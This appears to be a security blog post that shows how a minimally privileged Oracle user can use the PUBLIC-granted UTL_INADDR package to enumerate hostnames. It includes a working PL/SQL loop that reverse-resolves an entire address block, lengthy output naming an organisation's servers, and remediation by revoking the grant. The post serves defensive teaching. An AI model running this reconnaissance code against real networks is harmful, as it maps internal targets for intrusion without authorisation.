| Overview |
An Oracle Database hasn't been a "database" since version 6 or 7 depending on your point-of-view.
It was back in the days when dinosaurs still roamed the earth, mainframe people like some of us here, that Oracle began adding value to what had previously been only a database and turning into a rich,
fully function, application development and hosting platform. One of those additions is a built-in PL/SQL packaged named UTL_INADDR that can be used to interrogate both internal and external DNS resources to identify targets to attack.
What makes UTL_INADDR uniquely dangerous is that it is already installed inside the most secure zone of your firewall and is a trusted resource.
Adding to that trusted ownership and location is the fact that, by default, Oracle grants execute on this package to PUBLIC. To execute the demo on this page no privilege is required beyond CREATE SESSION which is the lowest level privilege with the database.
When an internal database call is made it will appear to most monitoring applications as having been made by the database owner "oracle" not by the person that executing the action.
And, given the lack of knowledge about databases on security teams why would a call to UTL_INADDR cause anyone to even look up, after all, they are monitoring for SQL*Injection attacks or other activities they are familiar with.
The demo is best viewed as a case where any user that has a valid userid and password can connect to the database with a command-line tool.
Finally,If you are concerned as you review this posting that "real" information was published on this website don't be.
The information has been altered in a manner that fully protects the organizations and we have received their permission to publish it in this form. |
| |
| Exploit Demo |
Let's start by creating a database user with the least possible privilege: CREATE SESSION.
SQL> conn / as sysdba
Connected.
SQL> CREATE user c##abc IDENTIFIED BY abc;
User Created.
SQL> GRANT create session TO c##abc;
Grant succeeded.
Now let's look at what this essentially unprivileged user can access.
SQL> conn c##abc/abc
Connected.
SQL> SELECT object_type, COUNT(*)
2 FROM all_objects
3 GROUP BY object_type
4 ORDER BY 1;
OBJECT_TYPE COUNT(*)
------------------- --------
CONSUMER GROUP 2
DESTINATION 2
EDITION 1
EVALUATION CONTEXT 1
FUNCTION 269
INDEX 111
INDEXTYPE 11
JAVA CLASS 37436
JAVA RESOURCE 1715
JOB CLASS 2
LOCKDOWN PROFILE 3
OPERATOR 59
PACKAGE 414
PROCEDURE 27
PROGRAM 1
SCHEDULE 4
SCHEDULER GROUP 4
SEQUENCE 10
SYNONYM 12121
TABLE 133
TABLE PARTITION 1
TYPE 1864
VIEW 1951
WINDOW 9
XML SCHEMA 43
In my current Oracle 18.3 database my totally unprivileged user gains some form of access to more than 56,000 objects.
This is, by definition, minimum privileges ... access to 37,436 Java Classes ... what could possibly go wrong?
But we need to focus on the 414 packages because they are very powerful and many are well documented.
And, as you can see below, our new user has access because the EXECUTE privilege is granted, at install, to PUBLIC.
SQL> SELECT owner, object_type
2 FROM all_objects
3 WHERE object_name = 'UTL_INADDR';
OWNER OBJECT_TYPE
------ ------------
SYS PACKAGE
PUBLIC SYNONYM
SQL> SELECT grantee, privilege
2 FROM all_tab_privs
3 WHERE table_name = 'UTL_INADDR';
GRANTEE PRIVILEGE
-------- ----------
PUBLIC EXECUTE
The following demonstration, performed on the public internet, shows how dangerous this capability can be
if deployed from an Oracle Database that is inside your firewall and has access to NTP, DNS, network devices,
storage arrays, application servers, and probably a large number of other database servers.
For this demo to work you should be connected to the internet with a wireless connection (because we don't
want you to lose your job doing it from inside your organization's network) and assumes that the target of
the demo has not moved to IPV6 addressing and has not tightened their security (they were notified over a year ago).
SQL> show user
USER is "ABC"
SQL> SELECT utl_inaddr.get_host_address('www.xyz.com') FROM dual;
UTL_INADDR.GET_HOST_ADDRESS('WWW.XYZ.COM')
-------------------------------------------
127.84.159.77
We now have the IP address of a server. Let's turn it into a server name.
SQL> SELECT
utl_inaddr.get_host_name('127.84.159.77')FROM dual;
UTL_INADDR.GET_HOST_NAME('127.84.159.77')
------------------------------------------
www-v.oit.xyz.com
And with a few lines of PL/SQL we can check every related IP address between .1 and .255
DECLARE
h_name VARCHAR2(60);
test_ip VARCHAR2(12) := '127.84.159.';
suffixn NUMBER(3) := 0;
suffixv VARCHAR2(4);
BEGIN
FOR i IN 1 .. 255 LOOP
suffixn := suffixn + 1;
IF suffixn < 10 THEN
suffixv := '00' || TO_CHAR(suffixn);
ELSIF suffixn BETWEEN 10 and 99 THEN
suffixv := '0' || TO_CHAR(suffixn);
ELSE
suffixv := TO_CHAR(suffixn);
END IF;
BEGIN
SELECT utl_inaddr.get_host_name(test_ip || suffixv)
INTO h_name
FROM dual;
dbms_output.put_line(test_ip || suffixv || ' - ' || h_name);
EXCEPTION
WHEN OTHERS THEN
NULL;
END;
END LOOP;
END;
/ |
Generating the following output
127.84.159.001 - cms.csom.xyz.com
127.84.159.002 - www.lib.xyz.com
127.84.159.003 - axway-outbound-proxy.oit.xyz.com
127.84.159.004 - futuregopher.xyz.com
127.84.159.005 - wwwstage.lib.xyz.com
127.84.159.006 - kronos-p.oit.xyz.com
127.84.159.007 - entkronos.oit.xyz.com
127.84.159.010 - ldap-v.oit.xyz.com
127.84.159.011 - ldapauth-v.oit.xyz.com
127.84.159.012 - appd-cap-tst.oit.xyz.com
127.84.159.013 - ttus.oit.xyz.com
127.84.159.014 - idp3-test-v.shib.xyz.com
127.84.159.015 - prd.cap.oit.xyz.com
127.84.159.016 - qa.cap.oit.xyz.com
127.84.159.017 - wwwgoldpass.oit.xyz.com
127.84.159.020 - www-temp.tc.xyz.com
127.84.159.021 - tst.delegations.xyz.com
127.84.159.022 - oit-oim-web-lb.micah.oit.xyz.com
127.84.159.023 - edw.oit.xyz.com
127.84.159.024 - uachievetfo-dev.oit.xyz.com
127.84.159.025 - 2019.umcf.xyz.com
127.84.159.026 - oit-lbc-ltmatt-750.oit.xyz.com
127.84.159.027 - prd.delegations.xyz.com
127.84.159.030 - bionet.oit.xyz.com
127.84.159.031 - finance.oit.xyz.com
127.84.159.032 - tfraportal.uservices.xyz.com
127.84.159.033 - ltmmgd-outbound-proxy-snat.oit.xyz.com
127.84.159.034 - lb-f5-vs1.oit.xyz.com
127.84.159.035 - engage-test.oit.xyz.com
127.84.159.036 - cehdvision2020-web.oit.xyz.com
127.84.159.037 - conner.xyz.com
127.84.159.040 - pds.oit.xyz.com
127.84.159.041 - plan.oit.xyz.com
127.84.159.042 - wwwplan.oit.xyz.com
127.84.159.043 - search-assets.xyz.com
127.84.159.044 - prepaid.oit.xyz.com
127.84.159.045 - mncamh.oit.xyz.com
127.84.159.046 - lpt-testing.oit.xyz.com
127.84.159.047 - umedia-new-lib.oit.xyz.com
127.84.159.050 - wwwdem.oit.xyz.com
127.84.159.051 - umreports-lb.oit.xyz.com
127.84.159.052 - mkey.oit.xyz.com
127.84.159.053 - google-lb.oit.xyz.com
127.84.159.054 - prod-umreports-old.oit.xyz.com
127.84.159.055 - 2016test.umreports.xyz.com
127.84.159.056 - oit-lbw-ltmauth-750.oit.xyz.com
127.84.159.057 - prod-umreports.oit.xyz.com
127.84.159.060 - csi.dev.psoft.xyz.com
127.84.159.061 - controller.oit.xyz.com
127.84.159.062 - designcenter-new.oit.xyz.com
127.84.159.063 - wwwhhh.oit.xyz.com
127.84.159.064 - hhh.oit.xyz.com
127.84.159.065 - scholarship.oit.xyz.com
127.84.159.066 - scholarship-test.oit.xyz.com
127.84.159.067 - gis.uspatial.uservices.xyz.com
127.84.159.070 - smtp.oit.xyz.com
127.84.159.071 - epro-qat-old.eresearch.xyz.com
127.84.159.072 - designhigh-new.oit.xyz.com
127.84.159.073 - design-n-new.oit.xyz.com
127.84.159.074 - travel.oit.xyz.com
127.84.159.075 - design-n.oit.xyz.com
127.84.159.076 - oib.oit.xyz.com
127.84.159.077 - dha-c-new.oit.xyz.com
127.84.159.100 - oit-lb-ltmauth-750-float.oit.xyz.com
127.84.159.101 - egms-ent2.oit.xyz.com
127.84.159.102 - hokanson-new.oit.xyz.com
127.84.159.103 - gopherpoints.oit.xyz.com
127.84.159.104 - trakbook.oit.xyz.com
127.84.159.105 - ay15.tst.moodle.oit.xyz.com
127.84.159.106 - work.csom.xyz.com
127.84.159.107 - oit-lb-ltmtest-750-float.oit.xyz.com
127.84.159.108 - finsys.oit.xyz.com
127.84.159.109 - media2.law.oit.xyz.com
127.84.159.110 - rrc.oit.xyz.com
127.84.159.111 - egms-tst2.oit.xyz.com
127.84.159.112 - wwwtest.oit.xyz.com
127.84.159.113 - www.oit.xyz.com
127.84.159.114 - oit-lb.oit.xyz.com
127.84.159.115 - uachievetfo-qat.oit.xyz.com
127.84.159.116 - ay15.moodle.xyz.com
127.84.159.117 - netfiles-tst.oit.xyz.com
127.84.159.118 - stem-projects.oit.xyz.com
127.84.159.119 - search-lb.oit.xyz.com
127.84.159.120 - humanfactors-new.oit.xyz.com
127.84.159.121 - mediahub-test.oit.xyz.com
127.84.159.122 - identity-new.oit.xyz.com
127.84.159.123 - mediahub.oit.xyz.com
127.84.159.124 - landarch-c-new.oit.xyz.com
127.84.159.125 - ccc-test.oit.xyz.com
127.84.159.126 - oit-lb-ltmatt-750-float.oit.xyz.com
127.84.159.127 - tfauth-ldap-v.oit.xyz.com
127.84.159.128 - prd.eresearch.xyz.com
127.84.159.127 - ps-proxy.oit.xyz.com
127.84.159.130 - prdegms.oit.xyz.com
127.84.159.131 - oncoretraining.oit.xyz.com
127.84.159.132 - a.oit.xyz.com
127.84.159.133 - ecrt-tst.eresearch.xyz.com
127.84.159.127 - ecrt-ent.eresearch.xyz.com
127.84.159.135 - cle-test.oit.xyz.com
127.84.159.136 - ecrt-trn.eresearch.xyz.com
127.84.159.137 - webapps-prd.oit.xyz.com
127.84.159.138 - landarch-n-new.oit.xyz.com
127.84.159.139 - fmresident-database.oit.xyz.com
127.84.159.140 - systemstatus.oit.xyz.com
127.84.159.141 - portcities-new.oit.xyz.com
127.84.159.142 - rp-new.oit.xyz.com
127.84.159.143 - shift-new.oit.xyz.com
127.84.159.144 - scep-test.oit.xyz.com
127.84.159.145 - stage2-new.oit.xyz.com
127.84.159.146 - it.oit.xyz.com
127.84.159.147 - x500test-v-lb.oit.xyz.com
127.84.159.148 - tpdbcrest.oit.xyz.com
127.84.159.149 - wwwtest-v-lb.oit.xyz.com
127.84.159.150 - cle.oit.xyz.com
127.84.159.151 - gis.uservices.xyz.com
127.84.159.152 - pharmd.oit.xyz.com
127.84.159.153 - uachievetfo-tst.oit.xyz.com
127.84.159.154 - worldheritage-c-new.oit.xyz.com
127.84.159.155 - fsi.tst.psoft.xyz.com
127.84.159.156 - csi.tst.psoft.xyz.com
127.84.159.157 - cle-new.oit.xyz.com
127.84.159.158 - umarket.xyz.com
127.84.159.159 - ici-docker-dev.oit.xyz.com
127.84.159.160 - shib-load-f5.oit.xyz.com
127.84.159.161 - egms-prd2.oit.xyz.com
127.84.159.162 - ftp-proxy-tkunz.oit.xyz.com
127.84.159.163 - oit-jsstest.oit.xyz.com
127.84.159.164 - ihcg-myu.oit.xyz.com
127.84.159.165 - envoy-old.oit.xyz.com
127.84.159.166 - stacks.oit.xyz.com
127.84.159.167 - canvas-lti-prd.oit.xyz.com
127.84.159.168 - cs-myu.oit.xyz.com
127.84.159.169 - dwtst.xyz.com
127.84.159.170 - appd-cap-dev-green.oit.xyz.com
127.84.159.171 - sirc-ent.eresearch.xyz.com
127.84.159.172 - ay16.qa.moodle.oit.xyz.com
127.84.159.173 - shib-prod-v.oit.xyz.com
127.84.159.174 - oit-oim-web-lb2.oit.xyz.com
127.84.159.175 - public-umanalytics.xyz.com
127.84.159.176 - ici-docker-prd.oit.xyz.com
127.84.159.177 - umanalytics.oit.xyz.com
127.84.159.178 - ccc.oit.xyz.com
127.84.159.179 - apps.lib.xyz.com
127.84.159.180 - fs-myu.oit.xyz.com
127.84.159.181 - hr-myu.oit.xyz.com
127.84.159.182 - esup-myu.oit.xyz.com
127.84.159.183 - umaps.oit.xyz.com
127.84.159.184 - hri.dev.psoft.xyz.com
127.84.159.185 - zoom.xyz.com
127.84.159.186 - studentserv.oit.xyz.com
127.84.159.187 - tst.cap.oit.xyz.com
127.84.159.188 - pilot.cap.oit.xyz.com
127.84.159.189 - itprem.oit.xyz.com
127.84.159.190 - appd-cap-prd.oit.xyz.com
127.84.159.191 - csi-qat-psoft.oit.xyz.com
127.84.159.192 - fsi-qat-psoft.oit.xyz.com
127.84.159.193 - hri.tst.psoft.xyz.com
127.84.159.194 - ay14.moodle.xyz.com
127.84.159.195 - hri.qat.psoft.xyz.com
127.84.159.196 - whost.oit.xyz.com
127.84.159.197 - whost2.oit.xyz.com
127.84.159.198 - whost3.oit.xyz.com
127.84.159.199 - gmail-dev.oit.xyz.com
127.84.159.200 - gmail-test.oit.xyz.com
127.84.159.201 - glogin-dev.oit.xyz.com
127.84.159.202 - glogin-test.oit.xyz.com
127.84.159.203 - test.statefair.oit.xyz.com
127.84.159.204 - devel.meded.oit.xyz.com
127.84.159.205 - eprotocol.oit.xyz.com
127.84.159.206 - gmail-prod.oit.xyz.com
127.84.159.207 - glogin-prod.oit.xyz.com
127.84.159.208 - design-n-test.oit.xyz.com
127.84.159.209 - excellence.oit.xyz.com
127.84.159.210 - oit-lbw-ltmatt-750.oit.xyz.com
127.84.159.211 - private.zoom.xyz.com
127.84.159.212 - ctrl-test.oit.xyz.com
127.84.159.213 - test.search-lb.oit.xyz.com
127.84.159.214 - dmc.xyz.com
127.84.159.215 - umedia-new.oit.xyz.com
127.84.159.216 - dev-old-orig.oim.xyz.com
127.84.159.217 - appd-cap-dev.oit.xyz.com
127.84.159.218 - trn.ras.oit.xyz.com
127.84.159.219 - ay16.tst.moodle.oit.xyz.com
127.84.159.220 - test.m.oit.xyz.com
127.84.159.221 - admissions-new.tc.xyz.com
127.84.159.222 - oit-lbw-ltmps-750.oit.xyz.com
127.84.159.223 - oit-lbc-ltmps-750.oit.xyz.com
127.84.159.224 - oit-lb-ltmps-750-float.oit.xyz.com
127.84.159.225 - oit-lbw-ltmmgd-750.oit.xyz.com
127.84.159.226 - oit-lbc-ltmmgd-750.oit.xyz.com
127.84.159.227 - oit-lb-ltmmgd-750-float.oit.xyz.com
127.84.159.228 - x-127-84-159-228.oit.xyz.com
127.84.159.229 - oit-splunk-prd-shc-lb.oit.xyz.com
127.84.159.230 - x-127-84-159-230.oit.xyz.com
127.84.159.231 - x-127-84-159-231.oit.xyz.com
127.84.159.232 - x-127-84-159-232.oit.xyz.com
127.84.159.233 - x-127-84-159-233.oit.xyz.com
127.84.159.234 - x-127-84-159-234.oit.xyz.com
127.84.159.235 - moodle2-lb.oit.xyz.com
127.84.159.236 - myu-lb.oit.xyz.com
127.84.159.237 - netfiles-lb.oit.xyz.com
127.84.159.238 - electrophysworkgroup.oit.xyz.com
127.84.159.239 - myu-test.oit.xyz.com
127.84.159.240 - ay13.moodle.xyz.com
127.84.159.241 - boxoffice-lb.oit.xyz.com
127.84.159.242 - avstage-lb.oit.xyz.com
127.84.159.243 - avreports-lb.oit.xyz.com
127.84.159.244 - avtest-lb.oit.xyz.com
127.84.159.245 - minnesotamasternaturalist.oit.xyz.com
127.84.159.246 - pay.oit.xyz.com
127.84.159.247 - cal-prod.oit.xyz.com
127.84.159.248 - dlp-reader-test.oit.xyz.com
127.84.159.249 - grouper-v.oit.xyz.com
127.84.159.250 - dgis.uservices.xyz.com
127.84.159.251 - dlp-reader-ssl.oit.xyz.com
127.84.159.252 - infotech-dc-01-v750.ggnet.xyz.com
127.84.159.253 - telecomb-dc-01-v750.ggnet.xyz.com
127.84.159.254 - datacenter-dc-01-v750.ggnet.xyz.com
How much have you learned about this organization if you were an attacker?
And we only highlighted a few of those that are problematic.
Not a single one of these needed to be exposed to the internet to be fully functional.
And we will gladly accept bets on whether all of the PSOFT servers are running PeopleSoft financials or HR.
Again, what is your risk if this capability was utilized from behind your
firewall?
Here is a short list of some of some of the worst naming we have seen while teaching organizations how to protect themselves
along with our guesses as to what they host.
127.76.032.052 - blv-sec-cert-rp.abcd.com - Bellevue data center security certifications
127.76.032.075 - dhcp17a.bcde.com - DHCP server
127.76.032.103 - bcag-fwal-01.cdef.com - Firewall
127.76.184.106 - phxntpx1.ntp.defg.net - Phoenix data center NTP server
... with a copper wire to everything
127.76.184.212 - phxdnsxp01.dns.ghij.net - Phoenix data center DNS server
... with a copper wire to everything
127.84.119.025 - g-smtp-w.tc.xyz.edu - SMTP
127.84.119.036 - ldapauth-w.tc.xyz.com - LDAP
... with a copper wire to almost everything
127.97.136.111 - sql-om.it.rstu.edu - SQL Server database
... it contained both PII and PHI
127.97.137.106 - people.mnop.com - PII information
127.97.137.104 - jira.sys.qrst.net - Support tickets
... containing systems with bugs and credentials
127.97.137.150 - umailx.umail.uvwh.org - Email
Our guesses may be wrong ... but if we were
contractors or vendors about to go onsite this information could save a lot of time identifying targets.
There is no excuse for making it this easy for the bad guys. |
| |
| Oracle Database Remediation |
SQL> conn / as sysdba
Connected.
SQL> REVOKE execute ON utl_inaddr FROM PUBLIC;
That is all it takes to eliminate this threat originating from an Oracle Database.
If you need UTL_INADDR for an application ... explicitly grant EXECUTE to the schema.
If you are terrified by the thought of disabling a grant to PUBLIC follow Oracle's instruction on creating a Network Access Control List. |
| Conclusion |
Oracle has an reason for not revoking the grant to public: Backward compatibility.
Organizations that continue to name servers based on their location and functionality, and even worse expose that information to the internet have no mitigating factors. Doing so is a demonstration of a lack of thought about security.
There were a number of separate issues exposed in this exploit.
- Naming servers in a way that betrays their location and/or functionality
- Exposing internal physical servers to the Internet which persists their name and address in core DNS
- Not creating appropriate rules in their firewalls
- Not revoking unnecessary grants of EXECUTE to PUBLIC in the Oracle Database
- Not creating an appropriate Network Access Control list in the database to block internet access
If you are an Oracle customer, and have now become aware of this threat what action are you going to take to eliminate it from your environment?
|